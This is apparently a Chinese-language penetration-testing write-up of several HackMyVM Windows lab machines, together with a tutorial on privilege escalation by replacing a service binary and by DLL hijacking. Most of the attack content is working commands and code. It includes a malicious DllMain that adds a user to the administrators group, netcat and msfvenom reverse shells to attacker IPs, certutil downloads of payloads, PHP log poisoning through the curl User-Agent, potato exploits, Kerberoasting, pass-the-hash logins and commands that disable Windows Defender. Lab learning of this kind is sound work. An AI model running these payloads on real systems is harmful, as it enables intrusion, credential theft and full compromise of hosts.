Invoke-PrivescCheck有一个高危的提权漏洞看看文件信息每一项描述如下（如果您精通linux提权的话，将会和linux进行类比）Name服务的 “内部名字”（操作服务时用，比如启停服务）nginx 服务的内部名就是 “nginx”（用systemctl restart nginx时的名字）后续想重启这个服务，要用到这个名字DisplayName服务的 “显示名字”（在 Windows 服务面板里看到的名字，方便你找到它）nginx 在 Linux 里的显示名可能是 “nginx - high performance web server”确认你改的是对的服务，别改错了User这个服务是用 “LocalSystem” 权限运行的（Windows 里的最高权限，比管理员还高）类比 Linux 里用 “root” 用户运行的 nginx 服务提权的关键！服务跑在最高权限，改了它的程序就能拿最高权限ImagePath服务启动时会执行的 “核心 exe 文件路径”（就是你要替换的那个文件）类比 Linux 里 nginx 守护进程的路径/usr/sbin/nginx目标文件！把这个 exe 换成恶意程序就行StartMode服务是 “自动启动” 的（开机或服务崩溃后会自己重启）类比 Linux 里systemctl enable nginx（开机自启）替换文件后不用手动触发，重启机器 / 服务就会执行恶意程序Type服务是 “独立进程”（启动时只跑这个 exe，不依赖其他程序）类比 Linux 里 nginx 是独立进程（ps aux | grep nginx能看到单独的进程） RegistryKey/Path服务在 Windows 注册表中的配置路径（不用管，提权用不上）类比 Linux 里 nginx 的配置文件路径/etc/nginx/nginx.conf（但这里是注册表，不用管）次要信息，不用关注Status服务当前状态（空，因为前面警告没查到）类比 Linux 里systemctl status nginx报错，看不到 “active” 还是 “inactive”后续手动用命令查就行，不影响提权UserCanStart你当前用户 “不能手动启动这个服务”类比 Linux 里普通用户不能systemctl start nginx没关系，能重启机器或杀进程间接触发UserCanStop你当前用户 “不能手动停止这个服务”类比 Linux 里普通用户不能systemctl stop nginx没关系，用taskkill（类比 Linux 的 kill）杀进程就行ModifiablePath你能修改的文件路径 —— 就是上面说的那个要替换的 exe（nessus-service.exe）类比 Linux 里ls -l /usr/sbin/nginx显示你有 w 权限，能改这个文件明确告诉你 “要改哪个文件”IdentityReference拥有这个修改权限的用户 —— 就是你当前的 “NESSUS\nesus” 用户类比 Linux 里ls -l /usr/sbin/nginx显示 “ubuntu rwx”（你的用户有权限）确认 “是你自己有这个改文件的权限”Permissions你的权限是 “完全控制”（能改、能删、能替换这个 exe，想干嘛干嘛）类比 Linux 里的 “rwx” 权限，尤其是 “w”（写入）权限 总结一下：你当前的nesus用户，能完全控制一个叫Tenable Nessus的服务 —— 这个服务是用 Windows 最高权限（LocalSystem，类比 Linux root）运行的，启动时会执行nessus-service.exe。而且这个服务是开机自动启动的，你只要把nessus-service.exe换成恶意程序，下次服务启动（重启机器 / 杀进程），恶意程序就会用最高权限跑起来 —— 和你在 Linux 里替换 root 运行的/usr/sbin/nginx、重启后拿 root 权限，完全一样。cd "C:\Program Files\Tenable\Nessus\" dir原来是可以利用直接替换这个应用程序进行提权，但是这里，杀软会查杀掉我们的msf马，要么你有能力过这个windows defender当然也可以使用nc，但是nc是一个应用程序，需要选用参数，而不是直接执行，就能上线msf或者kali的nc的，需要使用批处理也就是.bat# kali echo "C:\Users\nesus\Documents\nc.exe 192.168.53.51 4444 -e cmd.exe" > nessus-service.bat# evil-winrmupload nessus-service.bat "C:\Program Files\Tenable\Nessus\nessus-service.exe"这里漏掉了一个关键（你需要杀死它的进程，让服务自动重启）我们使用Stop-Process强制重启服务的时候报了一个错误：拒绝访问（Access is denied）Stop-Process -Id (Get-Process -Name "nessus-service").Id -Force遇到 “Access denied” 是因为nessus-service进程以LocalSystem权限运行，低权限用户无法直接杀死。如何解决？尝试更底层的taskkill！taskkill是 Windows 原生的进程杀死命令，权限处理和Stop-Process不同，先试一次：taskkill /f /im nessus-service.exe照样也是拒绝访问。重启计算机也没用，那么就换一种方法，dll劫持！dll劫持！6.10 DLL劫持6.10.1 什么是 DLL 劫持？（类比 Linux）1. 基础定义DLL（Dynamic Link Library，动态链接库）是 Windows 里的 “共享代码文件”，类似 Linux 的.so文件（Shared Object）。很多程序（比如服务、软件）运行时会主动加载依赖的 DLL 文件（比如调用 DLL 里的函数）。DLL 劫持的本质是：攻击者替换 / 插入一个恶意 DLL 文件，让高权限运行的目标程序（比如 LocalSystem 权限的服务）“误加载” 我们的恶意 DLL，从而执行恶意代码（相当于 Linux 里用LD_PRELOAD强制 root 进程加载恶意.so文件）。2. 类比 Linux 场景你在 Linux 里想提权时，可能会用LD_PRELOAD=/tmp/malicious.so /usr/bin/root_program，强制 root 运行的root_program加载你的恶意.so文件，.so里的代码会以 root 权限执行。Windows DLL 劫持和这个逻辑完全一样：让 LocalSystem 权限的Tenable Nessus服务，加载你写的恶意legacy.dll，DLL 里的代码会以LocalSystem权限执行。6.10.2 DLL 劫持提权过程1、查权限icacls "C:\Program Files\Tenable\Nessus\*.dll"是 Windows 中用来查看指定目录下所有dll文件 / 子目录权限的命令，作用类似 Linux 里的ls -l /path/*.dll（查看某个目录下所有文件的权限详情）。icacls "C:\Program Files\Tenable\Nessus\*.dll"为什么要使用这条命令？确认你当前用户（nesus）对服务依赖的 DLL 文件（比如legacy.dll）有写入 / 替换权限。从之前的权限结果看，nesus对这些 DLL 有F（完全控制）权限 —— 相当于 Linux 里用ls -l /usr/lib/root_program_dep.so看到普通用户有w权限，满足 “能替换文件” 的前提。权限表，和linux差不多，这里多了个修改还有删除，linux中只有rwx符号权限说明对应操作F完全控制读取、写入、执行、删除、修改属性M修改写入、删除（需配合F）RX读取和执行查看内容、运行程序R只读查看内容W写入修改内容（需目录权限）D删除删除文件或子目录2、编写恶意 DLL 代码在网上找到一个脚本，这是一个基础的恶意 DLL，核心逻辑在DLLMain函数里：/* DLL hijacking example author: @cocomelonc */#include <windows.h>BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {switch (ul_reason_for_call) {case DLL_PROCESS_ATTACH: // 程序加载DLL时触发（关键分支）system("cmd.exe /k net localgroup administrators nesus /add"); // 恶意命令：把nesus加入管理员组break;case DLL_PROCESS_DETACH: // 其他分支（进程卸载、线程创建/销毁）暂不用管break;case DLL_THREAD_ATTACH:break;case DLL_THREAD_DETACH:break;}return TRUE;}关键解释：DLLMain是 DLL 的 “入口函数”，类似 Linux.so文件的_init函数 —— 目标程序（Nessus 服务）加载 DLL 时，会自动调用DLLMain，并触发DLL_PROCESS_ATTACH分支。恶意命令net localgroup administrators nesus /add：把nesus加入管理员组（这里是示例，实际可写反弹 shell 命令，拿到 LocalSystem 权限）。Linux 类比：写一个恶意.so文件，在_init函数里执行system("usermod -aG sudo ubuntu")，让 root 进程加载时把普通用户加入 sudo 组。3、编译恶意 DLL（生成 Windows 能识别的格式）在 Kali 里用mingw编译 C 代码，生成 Windows 可加载的 DLL 文件：# kali x86_64-w64-mingw32-gcc exp.c -shared -o legacy.dllx86_64-w64-mingw32-gcc：Windows 交叉编译器（生成 64 位 Windows 程序，需和目标系统位数匹配）；-shared：生成 “共享库”（即 DLL 文件，对应 Linux 的.so）；-o legacy.dll：输出文件名为legacy.dll（必须和目标服务依赖的 DLL 同名，否则服务找不到）。4、备份原 DLL + 上传替换（避免服务崩溃 + 植入恶意文件）# evil-winrm cd "C:\Program Files\Tenable\Nessus" mv legacy.dll legacy_beifen.dll # 备份文件 upload legacy.dll # 上传你kali编译的dll文件备份原 DLL：legacy.dll是 Nessus 服务的依赖文件，直接删除会导致服务崩溃，备份后可回滚（类似 Linux 里cp /usr/lib/libnginx_dep.so /tmp/）；上传替换：让服务下次加载legacy.dll时，加载的是你的恶意 DLL（类似 Linux 里cp /tmp/malicious.so /usr/lib/libnginx_dep.so）。5、重启虚拟机（触发服务加载恶意 DLL）最后重启目标机，Nessus 服务会随系统开机启动 —— 启动时会自动加载依赖的legacy.dll（此时已被替换成恶意 DLL）：服务以LocalSystem（Windows 最高权限，类比 Linux root）启动；加载恶意legacy.dll，触发DLLMain的DLL_PROCESS_ATTACH分支；执行net localgroup administrators nesus /add，把nesus加入管理员组（实际可改为反弹 shell 命令，拿到 SYSTEM 权限）；重启后，nesus已拥有管理员权限，提权成功。6.10.3 DLL 劫持的核心利用条件（必须满足这 4 点，否则失败）和Linux.so劫持的条件类似，DLL 劫持能成功，必须同时满足以下 4 个条件（你的场景全部满足）：1. 目标程序（服务 / 软件）以高权限运行比如你的Tenable Nessus服务以LocalSystem权限运行（类比 Linux 里 root 运行的nginx）。若目标程序是普通用户权限，即使劫持成功，也只能拿到普通权限，无法提权。2. 你对目标程序加载的DLL 文件有写入 / 替换权限你的icacls结果显示，nesus对legacy.dll有F（完全控制）权限，能备份、删除、替换该 DLL（类比 Linux 里普通用户对/usr/lib/libnginx_dep.so有w权限）。若只有只读权限（RX），无法替换 DLL，劫持失败。3. 目标程序会主动加载该 DLL 文件legacy.dll是Tenable Nessus服务的 “依赖 DLL”—— 服务启动时必须加载它才能正常运行（类比 Linux 里nginx必须加载libnginx_dep.so）。若目标程序不加载该 DLL，即使替换了也没用（比如替换一个无关的 DLL 文件）。4. 恶意 DLL 能被目标程序成功加载恶意 DLL 的格式要正确（比如 32 位 / 64 位和目标程序匹配，你用x86_64编译对应 64 位系统）；若目标程序需要 DLL 导出特定函数（比如LoadLibrary调用的函数），恶意 DLL 需包含这些导出函数（你的示例是基础DLLMain，满足简单加载需求）。类比 Linux 里恶意.so需符合 ELF 格式，否则无法被nginx加载。6.10.4 总结：DLL 劫持提权的核心逻辑找到一个 “高权限运行、且依赖的 DLL 你能替换” 的程序（比如服务），用恶意 DLL 替换原 DLL，让高权限程序执行恶意代码，从而拿到高权限。7、HackMyVm-Always ：简单7.1 信息打点nmap -sS -p- -T4 10.10.10.161 -A使用目录扫描出来一个admin后台界面查看源码发现账号密码信息登录进来发现一个base编码解密ftpuser:KeepGoingBro!!!7.2 登录FTP使用刚刚的账号密码登录ftp 10.10.10.161发现了一个robots.txt，使用下面的命令将它下载下来get robots.txt查看这个robots.txt中的文件管理员的秘密笔记 1）禁用防火墙和 Windows Defender。 2）启用 FTP 和 SSH。 3）启动 Apache 服务器。 4）别忘了更改用户“always”的密码。当前密码是“WW91Q2FudEZpbmRNZS4hLiE=”。又得到一个密码always:YouCantFindMe.!.!7.3 远程登录发现密码不对，我们来使用hydra来爆破rdp协议使用enum4linux枚举，看到支持的smb协议，为1.0和2.0/2.1，3.0以上均不支持，让我联想到了永痕之蓝漏洞（MS17-010）enum4linux-ng -A 10.10.10.161 -C含义：-A是--all的缩写，表示执行全量信息收集，包含以下枚举内容：主机基础信息（主机名、工作组 / 域、MAC 地址）；SMB 协议支持情况（支持的 SMB 版本、签名配置）；用户和组列表（本地用户、域用户、内置组等）；共享目录（可访问的 SMB 共享及权限）；操作系统版本（通过 RPC 或 SMB 信息推断）；服务、打印机、系统策略等其他信息。7.4 永痕之蓝利用，很遗憾利用失败利用nxc枚举这两个账号密码always:YouCantFindMe.!.! ftpuser:KeepGoingBro!!!看到ftpuser用户，尝试登录，也不让远程登录7.5 近源攻击这里没找到其他方法，直接登录靶机上传shell吧（近源攻击），这里还需要注意，就是需要修改一下语言为美国的，不然登录不进去7.6 Msf获取反向shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.137 LPORT=4444 -f exe -o shell.exe certutil -urlcache -split -f http://10.10.10.137:8000/shell.exe c:\1.exemsf上线msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.10.10.137 set lport 4444 run7.6 MSF内核漏扫use multi/recon/local_exploit_suggester使用第一个模块，设置第一个会话，并进行提权8、HackMyVm-Runas ：简单8.1 信息打点首先进行全端口扫描端口详细信息探测时使用guest账户即可获取信息，说明 SMB 可能允许匿名访问或 guest 权限过高。可以使用smbclient进行匿名登录试试，登录成功！但是没有任何东西ms17-010使用目录扫描、nothing8.2 文件包含利用来到首页点进来index.php发现需要我们传一个file参数，大概率就是文件包含了尝试包含index.php没有效果利用burp进行批量文件包含，字典网上随便找几个筛选内容可以看到这里有一段密文runas-b3a805b2594befb6c846d718d1224557yakuzza解密网站https://www.somd5.com/8.3 远程连接有了账号密码，登录口在哪？看了看之前的端口扫描结果是没有3389端口的，但是现在又有了。。。。。（中途换了换网，ip变成了10.10.10.168）可能是我疏忽了吧，快点来连，搞不好等一下又关了8.4 创建反向shellwindows下载马certutil.exe -urlcache -split -f http://10.10.10.137:8000/shell.exemsf注意监听，同时执行windows机器上的马msfconsole use multi/handler set lhost 10.10.10.137 set payload windows/meterpreter/reverse_tcp run8.5 MSF内核提权全部失败。。。8.6 WinPEAS提权在windows中下载下来，并执行，发现一个最新的漏洞补丁没有打certutil.exe -urlcache -split -f http://10.10.10.137:8000/winPEAS.bat ./winPEAS.bat使用searchsploit检索exp在windwos中的VS打开，打包成exe放上去执行的时候没有任何回显，失败了8.7 土豆提权后面又试过好几种方法，土豆提权，提权失败certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET4.exe GodPotato-NET2.exe -cmd "cmd /c whoami" GodPotato-NET35.exe -cmd "cmd /c whoami" GodPotato-NET4.exe -cmd "cmd /c whoami"8.8 JuicyPotato提权烂土豆提权certutil.exe -urlcache -split -f http://10.10.10.137:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/CLSID/Windows_7_Enterprise/CLSID.list certutil.exe -urlcache -split -f http://10.10.10.137:8000/juicy-potato/Test/test_clsid.batJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\runas\nc.exe 10.10.10.137 4444 -e c:\windows\system32\cmd.exe" -t *执行成功了，但是不能执行命令，提权失败8.9 runas提权在网上找到了这个，使用runas提权https://www.cnblogs.com/kqdssheng/p/18751119在上面这个图片中，可以看到本地管理员账户的凭据已存储在凭据管理器中，并且当前用户是runas！当前的runas用户能列出RUNAS-PC\Administrator的缓存凭据，具备利用这些凭据实现本地提权的条件Domain:interactive=RUNAS-PC\Administrator是 “交互式登录的管理员凭据缓存”，意味着系统之前保存过 Administrator 的登录信息（比如用户曾用 Administrator 登录，或通过runas /savecred保存过凭据）。虽然无法直接看到明文密码，但 Windows 允许 “在缓存凭据存在时，以该用户身份执行程序”—— 这是提权的关键：8.10 两种具体提权方法使用下面的命令启动一个cmdrunas /savecred /user:RUNAS-PC\Administrator "cmd.exe"此时你执行完这条命令目标机器就会弹出一个cmd窗口，此时你执行命令的时候就是administrator超级管理员，那么我们是不是能够通过上面这条命令执行一个木马，或者nc，来反弹这个shell到kali上？来试试，提权成功！certutil.exe -urlcache -split -f http://10.10.10.137:8000/nc.exe # 从kali中下载nc runas /savecred /user:Administrator "C:\Users\runas\nc.exe 10.10.10.169 4444 -e cmd.exe"8.11 msf内核扫描提升至系统权限可以使用winPACE.exe进行信息收集，在尝试过各种admin提权到系统权限的方式比如multi/recon/local_exploit_suggester MS17-017 exploit/windows/local/ms16_075_reflection 烂土豆提权 土豆提权 多土豆汁提权等等MS16-032最终测试出来windows/local/service_permissions能够成功提权到system权限，Windows服务权限配置错误漏洞。8.13 抓取明文密码上传mimikatz，获取明文密码！！certutil.exe -urlcache -split -f http://10.10.10.169:8000/mimikatz.exe9、TriplAdvisor ：简单9.1 信息打点nmap -sS 192.168.53.243 -p- -T4发现有一个http的域名解析，需要我们在hosts文件中添加好相关的信息nmap -sS 192.168.53.243 -p 445,5985,8080 -T4 -A打开windows的hosts文件，添加如下信息C:\Windows\System32\drivers\etc\hostskali攻击机器中也不能忘了（方便渗透测试，windows中添加只是为了访问，当然也可以配置代理到kali）echo "192.168.53.243 tripladvisor" >> /etc/hosts打开信息收集插件，发现这是一个wordpress内容管理系统wpscan进行可能的用户，后台密码爆破wpscan --url http://tripladvisor:8080/wordpress/ -e u -P /usr/share/wordlists/fasttrack.txtwordpress版本信息已经被扫描出来了再使用详细扫描，发现一个插件wpscan --url http://tripladvisor:8080/wordpress/9.2 漏洞利用漏洞检索searchsploit editor 1.1 wordpress searchsploit -m 44340漏洞信息┌──(root㉿kali)-[/data/demo] └─# cat 44340.txt Product: Site Editor Wordpress Plugin - https://wordpress.org/plugins/site-editor/ Vendor: Site Editor Tested version: 1.1.1 CVE ID: CVE-2018-7422** CVE description **A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.** Technical details **In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.Vulnerable code:if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){require_once $_REQUEST['ajax_path'];}https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.** Proof of Concept **http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd** Solution **No fix available yet.** Timeline **03/01/2018: author contacted through siteeditor.org's contact form; no reply16/01/2018: issue report filled on the public GitHub page with no technical details18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail19/01/2018: report sent; author says he will fix this issue "very soon"31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply14/02/2018: WP Plugins team contacted; no reply06/03/2018: vendor contacted; no reply07/03/2018: vendor contacted; no reply15/03/2018: public disclosure** Credits **Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).--Best Regards,Nicolas Buzy-DebatOrange Cyberdefense Singapore (CERT-LEXSI)存在文件包含漏洞，根据上面的url进行修改http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd因为这是windows系统，不存在/etc/passwd，那么怎么快速判断文件是否存在？字典https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt打开bp这里我们上传不了文件（没有账号密码），所以只能包含日志文件c:/xampp/apache/logs/access.log9.3 反弹shell使用curl写入日志，并包含日志文件，尝试获取命令执行结果，结果能正常执行命令┌──(root㉿kali)-[/usr/share/wordlists] └─# curl -A "<?php system('ipconfig /all');?>" http://tripladvisor:8080/wordpress/ ┌──(root㉿kali)-[/usr/share/wordlists] └─# curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=c:/xampp/apache/logs/access.log"根据前面传msf马上去的经验，这里就传个nc吧curl -A "<?php system('certutil.exe -urlcache -split -f http://192.168.53.51:8000/nc.exe');?>" http://tripladvisor:8080/wordpress/ curl -A "<?php system('nc.exe 192.168.53.51 1234 -e cmd');?>" http://tripladvisor:8080/wordpress/ curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=\xampp\apache\logs\access.log"切换到当前用户的文件夹，可以看到第一个flag将这个shell利用nc传到msf中，进行本地漏扫（试一试，说不定就出来了呢，虽然它只在meterpreter后渗透模块中生效）nc.exe 192.168.53.51 1234 -e cmd9.4 msf内核漏扫msfconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload（nc反弹的是基础shell，非meterpreter）# 目标是Windows，接收nc命令反弹的shell：set PAYLOAD windows/shell_reverse_tcpset LHOST 192.168.53.51 # 攻击机IP（与nc反弹目标一致）set LPORT 1234 # 监听端口（与nc反弹端口一致）run -j # 启动监听，保持后台执行use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块，估计这里没效果，目前测试只有meterpreter模块反弹的shell能用set session 1 # 设置反弹成功的会话id为1，使用 sessions 即可查看所有的会话id9.5 土豆提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET4.exe失败.\GodPotato-NET4.exe -cmd "cmd /c whoami" .\GodPotato-NET35.exe -cmd "cmd /c whoami" .\GodPotato-NET2.exe -cmd "cmd /c whoami"9.6 JuicyPotato提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.listhttps://github.com/ohpe/juicy-potato/blob/master/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.list然后用这个工具测试certutil.exe -urlcache -split -f http://192.168.53.51:8000/juicy-potato/Test/test_clsid.bat此时你的靶机上应该要有这三个文件此时验证一下，能否正常访问administrotar的文件，结果为拒绝访问（因为靶机限制了我不能使用whoami，所以只能这样验证）回到目录，执行此文件随便选择一个系统权限的clsid最终提权命令如下，kali记得开ncJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\xampp\htdocs\wordpress\wp-content\plugins\editor\editor\extensions\pagebuilder\includes\nc.exe 192.168.53.51 4444 -e cmd.exe" -t *此时就可以访问管理员的文件了10、HackMyVm-DC01 ：简单10.1 信息打点nmap -sS 192.168.53.26 -p- -T4 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'漏洞扫描nmap -sS 192.168.53.26 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49707,49783 -T4 --script=vuln使用新版enum4linux枚举系统的全部信息enum4linux-ng -A 192.168.53.26 -C10.2 SMB无密登录列出来smb共享文件夹可以匿名登录的共享目录中都没有文件，只能继续信息收集从上面enum4linux-ng枚举结果显示除了SMB服务，还有LDAP以及LDAPS（加密传输，类似于https）服务可达，运行在389/636端口LDAP 是域内 “用户 / 组 / 计算机信息的数据库”，后续有账号就能查域内核心信息（如用户列表、管理员组）。Appears to be root/parent DC：目标可能是”主域控制器“，也就是域控，完整的域名为：SOUPEDECODE.LOCAL域控制器（DC）是域的 “核心”，存储所有域信息（账号、权限、计算机），拿下它就等于控制整个域后续 LDAP 查询（如ldapsearch）要写-b "dc=SOUPEDECODE,dc=LOCAL"，Kerberos 攻击要指定-d SOUPEDECODE.LOCAL，没有这个域名，大部分域操作都无法执行。域的 “短域名” 是 SOUPEDECODE（完整域名是 SOUPEDECODE.LOCAL，短域名是简化版）后续登录域账号时可用短域名（如SOUPEDECODE\admin）或完整域名（如admin@SOUPEDECODE.LOCAL），两种格式都支持，短域名更简洁。其中- SOUPEDECODE <1c> - <GROUP> B <ACTIVE> Domain Controllers代表着 DC01 属于 “域控制器组”，进一步验证它是域控制器，不是普通域内主机。刚刚提到了，使用LDAP查询（如ldapsearch）需要增加一个参数 -b，Kerberos 攻击要指定-d SOUPEDECODE.LOCAL10.3 ldapsearch那么利用ldapsearch的完整命令就如下ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b "dc=SOUPEDECODE,dc=LOCAL" -s base "(objectclass=user)"上面的代码是什么意思呢？其核心”匿名访问被拒绝“各个参数解释如下连接192.168.53.26这台 LDAP 服务器（域控制器）；用匿名方式访问（-D '' -w ''表示空用户名、空密码）；查询dc=SOUPEDECODE,dc=LOCAL这个节点（域的核心数据节点，存储用户、组等信息）；只查该节点本身（-s base），且只找 “用户类型” 的对象（(objectclass=user)）。为什么报错了？text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c翻译过来是：“要执行这个操作，必须先在连接上完成‘成功的绑定’（即提供有效的账号密码进行身份验证）”我们想访问的dc=SOUPEDECODE,dc=LOCAL节点是域的 “敏感数据区”（存着用户账号、权限等核心信息），域控制器为了安全，禁止匿名用户访问这个区域，必须用 “合法的域账号” 登录后才能查询。如果不加这个-b参数呢，把它去掉，这样就成功了ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b '' -s base "(objectclass=user)"这段ldapsearch结果包含了域控制器（192.168.53.26）的核心架构信息我们之前执行的命令指定-b "dc=SOUPEDECODE,dc=LOCAL"，默认查的是 LDAP 的 “根节点”（-b ""）：根节点只存域的基础架构信息（如域名、支持的协议），不包含敏感数据，所以允许匿名访问，命令能成功；而之前指定的dc=SOUPEDECODE,dc=LOCAL 是 “核心数据节点”，匿名访问被拒绝，所以报错。这次查询返回的是 LDAP 根节点的配置信息，本质是域控制器 “公开可见的基础架构数据”，包含 5 类关键内容：域的命名结构（域名、目录节点路径）；域功能级别（操作系统版本版本）；支持的协议和认证机制；域控制器的身份标识标识（主机名、角色）；LDAP 服务的配置限制（如最大连接数、查询超时）。10.4 匿名枚举用户的SID解释那么多，渗透到目前收集到的信息，本质就是没有账号密码，获取账号密码可以利用lookupsidfind / -name lookupsid* 2>/dev/nulllookupsid.py是 Impacket 工具集中的SID 枚举工具，核心作用是通过 SMB/LDAP 协议查询目标系统的安全标识符（SID）及其对应账号 / 组信息，在域渗透中常用于 “匿名 / 低权限枚举域内关键账号（如管理员）”，下面枚举soupedecode.local这个域的SID信息，并使用匿名账号和空密码（-no-pass）登录（部分域会禁用匿名登录，这里是一个突破点）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/anonymous@192.168.53.26 -no-pass为什么能列举出来SID？lookupsid.py，通过匿名访问这个域（工具连接域控制器后，会先查询 “域本身的 SID”），通过枚举rid（sid最后一部分），再拼接完整的sid，工具把每个 “完整 SID” 发给域控制器，调用它的LsaLookupSids2接口（就像查字典），问：“这个 SID 对应哪个账号？”，这样工具就会返回给你对应的账号信息# 筛选 SidTypeUser 行 → 提取账号名（去掉 SOUPEDECODE\） → 去重 → 保存到 target_users.txt，AI一下就行 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt10.5 nxc内网渗透nxc内网渗透神器，进行SMB爆破，但是这里我们是用户和密码都不知道，相当于burpsuite中的集群炸弹攻击，为了减少攻击次数，我们可以使用相同的账号密码，进行攻击，也就是burpsuite中的Pitchfork攻击所以命令如下nxc smb 192.168.53.26 -u target_users.txt -p target_users.txt --no-bruteforce --continue-on-success找到ybob317:ybob317账号密码，继续接下来的渗透，smb登录，照样也没有任何东西换一个USERS，这里面有东西，我们去看看，全部下载下来尝试上传一个文件shell，禁止上传将全部的文件都下载下来recurse ON prompt OFF mget *在ybob317中找到了flag10.6 kerberos攻击服务器上开启了kerberos服务如果目标是域控制器（DC）（如你之前枚举的DC01.SOUPEDECODE.LOCAL），则一定开启了 Kerberos 服务，因为：1、Kerberos 是 Windows 域环境的核心认证协议，用于域内账号登录、服务访问等身份验证；2、域控制器作为 Kerberos 的 “密钥分发中心（KDC）”，必须运行 Kerberos 服务（kdc.exe进程），否则域功能无法正常工作。impacket-GetUserSPNs -request -dc-ip 192.168.53.26 SOUPEDECODE.LOCAL/ybob317:ybob317通过域用户ybob317的凭证，向域控制器（IP：192.168.53.26）查询域内所有关联了 SPN 的用户，并强制请求并获取这些用户的 TGS 票据（Ticket-Granting Service），最终可用于破解用户密码（利用hashcat等工具爆破 TGS 票据哈希）。同步时间ntpdate 192.168.53.26将这些内容全部复制到一个名叫”hash“文件中，使用hashcat攻击，爆破出来file_svc用户的密码为Password123!!hashcat -a 0 -m 13100 hash /usr/share/wordlists/rockyou.txt使用smbclient登录smbclient //192.168.53.26/backup -U file_svc Password123!! get backup_extract.txt exit随后使用awk进行筛选awk -F '[:]' '{print $4}' backup_extract.txt > ntml.txtnxc smb 192.168.53.26 -u target_users.txt -H ntml.txt最终账号密码如下FileServer$ ：e41da7e79a4c76dbd9cf79d1cb32555910.7 远程连接evil-winrm -i 192.168.53.26 -u "FileServer$" -H "e41da7e79a4c76dbd9cf79d1cb325559"至此已经拿到了管理员权限，和最后的flag，据说在域中administrator就是系统权限10.8 获取system权限后续如果有兴趣的是否可以利用这个管理员权限提升至系统权限，默认的cmd下载命令不能用，只能用powershell，命令如下Invoke-WebRequest -Uri "http://192.168.53.141:8000/PrivescCheck.ps1" -OutFile "PrivescCheck.ps1" ​ Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1  # 或者. .\PrivescCheck.ps1 Invoke-PrivescCheck ​ Set-MpPreference -DisableRealtimeMonitoring $true  # 关闭杀软 ​ Invoke-WebRequest -Uri "http://192.168.53.141:8000/shell.exe" -OutFile "shell.exe" ./shell.exe  # msf生成的马可以看到是能正常上线的扫描出来两个提权漏洞，第二个不能用可以使用第一个，但是没有创建成功会话，由于桥接模式老是自动换ip，就不继续了，另外使用mimikatz.exe也不能正常执行，x86和x64都试过了，后续有做出来的师傅，欢迎添加我好友，一起讨论 + baibaixiaoyu2024exploit/windows/local/ms16_032_secondary_logon_handle_privesc12、HackMyVm-DC02 ：中等中途可能会切换好几次IP，但是都是同一个靶机，我自己网络不稳定，或者机器环境有问题，重装导致的，不用管IP的变化12.1 端口扫描这里使用nmap进行全端口扫描，识别目标开放的服务和操作系统信息nmap -sS -p- -T4 192.168.219.240 -A端口53：DNS服务，用于域名解析 端口88：Kerberos认证，域用户登录验证 端口139/445：SMB文件共享服务 端口389：LDAP目录服务，存储用户信息 端口636：安全的LDAP 端口5985：WinRM远程管理 这些端口组合表明这是一个域控制器！12.2 enum4linux枚举使用enum4linux-ng通过 LDAP/SMB/RPC 等协议枚举目标系统信息（是enum4linux的升级版，现在有社区维护，老版已不再维护）enum4linux-ng -A 